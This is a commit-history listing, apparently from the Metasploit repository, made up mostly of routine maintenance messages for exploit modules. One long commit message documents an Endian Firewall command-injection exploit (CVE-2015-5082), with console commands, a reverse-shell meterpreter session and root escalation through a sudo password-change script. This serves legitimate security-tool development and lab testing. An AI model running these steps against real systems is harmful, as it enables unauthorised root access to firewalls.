Commit Graph

604 Commits (089a0064080d185d6b1f281ca499818f264fcc0f)

Author SHA1 Message Date
HD Moore f86f427d54 Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00
wchen-r7 154fb585f4 Remove bad references (dead links)
These links are no longer available. They are dead links.
2015-10-27 12:41:32 -05:00
Tod Beardsley 185e947ce5
Spell 'D-Link' correctly 2015-10-12 17:12:01 -05:00
Tod Beardsley 336c56bb8d
Note the CAPTCHA exploit is good on 1.12. 2015-10-12 17:09:45 -05:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
HD Moore cd65478d29
Land #5826, swap ExitFunction -> EXITFUNC 2015-09-01 13:58:12 -05:00
Christian Mehlmauer 3e613dc333
change exitfunc to thread 2015-09-01 10:43:45 +02:00
Christian Mehlmauer 648c034d17
change exitfunc to thread 2015-09-01 10:42:15 +02:00
Christian Mehlmauer 80a22412d9 use EXITFUNC instead of ExitFunction 2015-08-13 21:22:32 +02:00
jvazquez-r7 203c231b74
Fix #5659: Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00
wchen-r7 768de00214 Automatically pass arch & platform from cmdstager
This allows the cmdstager mixin to automatically pass the arch
and platform information without changing the modules. This should
address the following tickets:

Fix #5727
Fix #5718
Fix #5761
2015-07-27 14:17:21 -05:00
wchen-r7 6720a57659 Fix #5761, pass the correct arch and platform for exe generation
Fix #5761
2015-07-23 01:34:44 -05:00
Christian Mehlmauer b31c637c1b
Land #5533, DSP-W110 cookie command injection 2015-07-15 11:22:33 +02:00
Christian Mehlmauer 21375edcb2
final cleanup 2015-07-15 11:21:39 +02:00
Michael Messner d7beb1a685 feedback included 2015-07-09 08:31:11 +02:00
HD Moore 25e0f888dd Initial commit of R7-2015-08 coverage 2015-07-08 13:42:11 -05:00
Michael Messner 5b6ceff339 mime message 2015-07-06 15:00:12 +02:00
Ben Lincoln 6e9a477367 Removed reference URL for the report to the vendor, as it is no
longer valid.
2015-07-03 13:48:24 -07:00
Ben Lincoln 02ace9218b Added handling for HTTP 401 (Authorization Required) response from target.
Added Exploit DB entries to references list.

Minor change to description text for clarity.
2015-07-03 13:36:44 -07:00
Ben Lincoln db721dff8e Cleaned up double-negative logic.
Decreased default HTTPClientTimeout to 5 seconds.
2015-07-01 09:34:11 -07:00
Ben Lincoln 6ceb734972 Replaced standard option TIMEOUT with advanced option
HTTPClientTimeout per void-in's request.

Added handling for HTTP 404 response condition from server.
2015-07-01 09:04:15 -07:00
Ben Lincoln 3d32438b34 Added missing closing paren in description text. 2015-06-30 12:43:31 -07:00
Ben Lincoln e929dec829 Re-formatted and tweaked the module description. 2015-06-30 12:42:17 -07:00
Ben Lincoln ce61bcd3b4 Removed a trailing space from line 40. 2015-06-29 22:48:16 -07:00
aos 13dc181f1c Exploit Module: Endian Firewall Proxy Password Change Command Injection
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)

Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2

Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1

Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.

Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.

Example usage / output:

```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit

[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress -  18.28% done (196/1072 bytes)
[*] Command Stager progress -  36.57% done (392/1072 bytes)
[*] Command Stager progress -  54.85% done (588/1072 bytes)
[*] Command Stager progress -  73.13% done (784/1072 bytes)
[*] Command Stager progress -  91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)

meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer     : efw220.vuln.local
OS           : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie

bash: no job control in this shell
bash-3.00# whoami
root
```

Steps to verify module functionality:

Go to http://sourceforge.net/projects/efw/files/Development/

Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.

Download the ISO file for that version.

Create a VM using the ISO:
  For purposes of VM configuration:
    - Endian is based on the RHEL/CentOS/Fedora Core Linux
	  distribution.
    - The ISOs will create a 32-bit x86 system.
    - 512MB of RAM and 4GB of disk space should be more than enough.
    - Be sure to configure the VM with at least two NICs, as the Endian
      setup is difficult (impossible?) to complete with less than two
      network interfaces on the host.
  For the Endian OS-level (Linux) installation:
    - Default options are fine where applicable.
	- Be sure to pick a valid IP for the "Green" network interface, as
	  you will use it to access a web GUI to complete the configuration
	- If prompted to create a root/SSH password and/or web admin
	  password, make a note of them. Well, make a note of the web admin
	  password - the exploit module will let you change the root
	  password later if you want to. This step is dependent on the
	  version selected - some will prompt, others default the values to
	  "endian".
	- Once the OS-level configuration is complete, access the web
	  interface to complete the setup. If you used 172.16.47.1 for the
	  "Green" interface, then the URL will be
	  https://172.16.47.1:10443/
	- If the web interface is not accessible, reboot the VM (in some
	  versions, the web interface does not come up until after the
	  first post-installation reboot).
  For the web interface-based configuration:
    - If you were prompted to select an admin password, use it. If not,
	  the username/password is admin/endian.
	- Use the second NIC for the "Red" interface. It will not actually
	  be used during this walkthrough, so feel free to specify a bogus
	  address on a different/nonexistent subnet. Same for its default
	  gateway.
	- Once the base configuration is complete, access the main web
	  interface URL again.
	- Switch to the Proxy tab.
	- Enable the HTTP proxy.
	- Click Save (or Apply, depending on version).
	- If prompted to apply the settings, do so.
	- Click on the Authentication sub-tab.
	- Make sure the Authentication Method is Local (this should be the
	  default).
	- Click the _manage users_ (Or _User management_, etc., depending
	  on version) button.
	- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
	- Enter "proxyuser" for the username, and "password123" for the
	  password, or modify the directions below this point accordingly.
	- Click the _Create user_ button.
	- If prompted to apply the settings, do so.

Module test	process:
  From within the MSF console, execute these commands:

    use exploit/linux/http/efw_chpasswd_exec
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST [YOUR_HOST_IP]
    set LPORT 443
    set RHOST [ENDIAN_GREEN_IP]
    set EFW_USERNAME proxyuser
    set EFW_PASSWORD password123
    exploit

  Once Meterpreter connects, execute the following Meterpreter
  commands:
    getuid
    sysinfo
    shell

  Within the OS shell, execute the following commands:
    whoami
	uname -a
	sudo -l
	sudo /usr/local/bin/chrootpasswd

  It will appear as though the command has hung, but it is actually
  waiting for input. Type "IlikerootaccessandIcannotlie", then press
  enter.

  Execute the following OS command in the shell:
    su

  Type "IlikerootaccessandIcannotlie", then press enter.

  Verify root access (whoami, etc.).
2015-06-29 12:03:17 -07:00
Michael Messner c8dddbff70 server header 2015-06-24 21:32:01 +02:00
Michael Messner 8bc012a665 echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00
Michael Messner d8e11789ea cmd_interact - first try 2015-06-20 07:59:25 +02:00
jvazquez-r7 c2f0973ed0
Report attempt_time 2015-06-19 10:31:50 -05:00
wchen-r7 fb9ad663f7 Change to Metasploit::Model::Login::Status::SUCCESSFUL 2015-06-18 23:42:16 -05:00
Michael Messner 145637470a port, email, cleanup 2015-06-14 08:27:23 +02:00
Michael Messner 1b040f3374 dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
wchen-r7 744baf2d44 Update kloxo_sqli to use the new cred API 2015-06-03 23:28:35 -05:00
m-1-k-3 c8123c147f upnp vs hnap 2015-05-05 20:57:05 +02:00
Christian Mehlmauer 73f7885eea
add comment 2015-05-29 23:08:55 +02:00
jvazquez-r7 1be04a9e7e
Land #5182, @m-1-k-3's exploit for Dlink UPnP SOAP-Header Injection 2015-05-29 14:49:09 -05:00
jvazquez-r7 8b2e49eabc
Do code cleanup 2015-05-29 14:45:47 -05:00
jvazquez-r7 9ccf04a63b
Land #5420, @m-1-k-3's miniigd command injection module (ZDI-15-155) 2015-05-29 13:29:03 -05:00
jvazquez-r7 9ebd6e5d6e
Use REXML 2015-05-29 13:27:19 -05:00
jvazquez-r7 294fa78c1f
Land #5430, @m-1-k-3's adding specific endianess Arch to some exploits 2015-05-29 11:43:25 -05:00
jvazquez-r7 dd39d196f5
Land #5226, @m-1-k-3's Airties login Buffer Overflow exploit 2015-05-29 10:51:32 -05:00
jvazquez-r7 952f391fb4
Do minor code cleanup 2015-05-29 10:49:51 -05:00
Michael Messner 666b0bc34a MIPSBE vs MIPS 2015-05-28 18:50:48 +02:00
Michael Messner 10baf1ebb6 echo stager 2015-05-23 15:50:35 +02:00
Tod Beardsley f423306b6f
Various post-commit fixups
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys

Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192, @joevennix's module for Safari CVE-2015-1126

Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in

Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016,
add SSL Labs scanner

Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101, Add Directory Traversal for GoAhead Web Server

Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158, OWA internal IP disclosure scanner

Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159, WordPress Mobile Edition Plugin File Read Vuln

Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924, @m-1-k-3's DLink CVE-2015-1187 exploit

Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131, WordPress Slideshow Upload

Edited modules/exploits/windows/local/run_as.rb first landed in #4649,
improve post/windows/manage/run_as and as an exploit

(These results courtesy of a delightful git alias, here:

```
  cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"

```

So that's kind of fun.
2015-05-06 11:39:15 -05:00
m-1-k-3 c7e05448e7 various MIPS vs MIPSBE fixes 2015-05-04 12:55:21 +02:00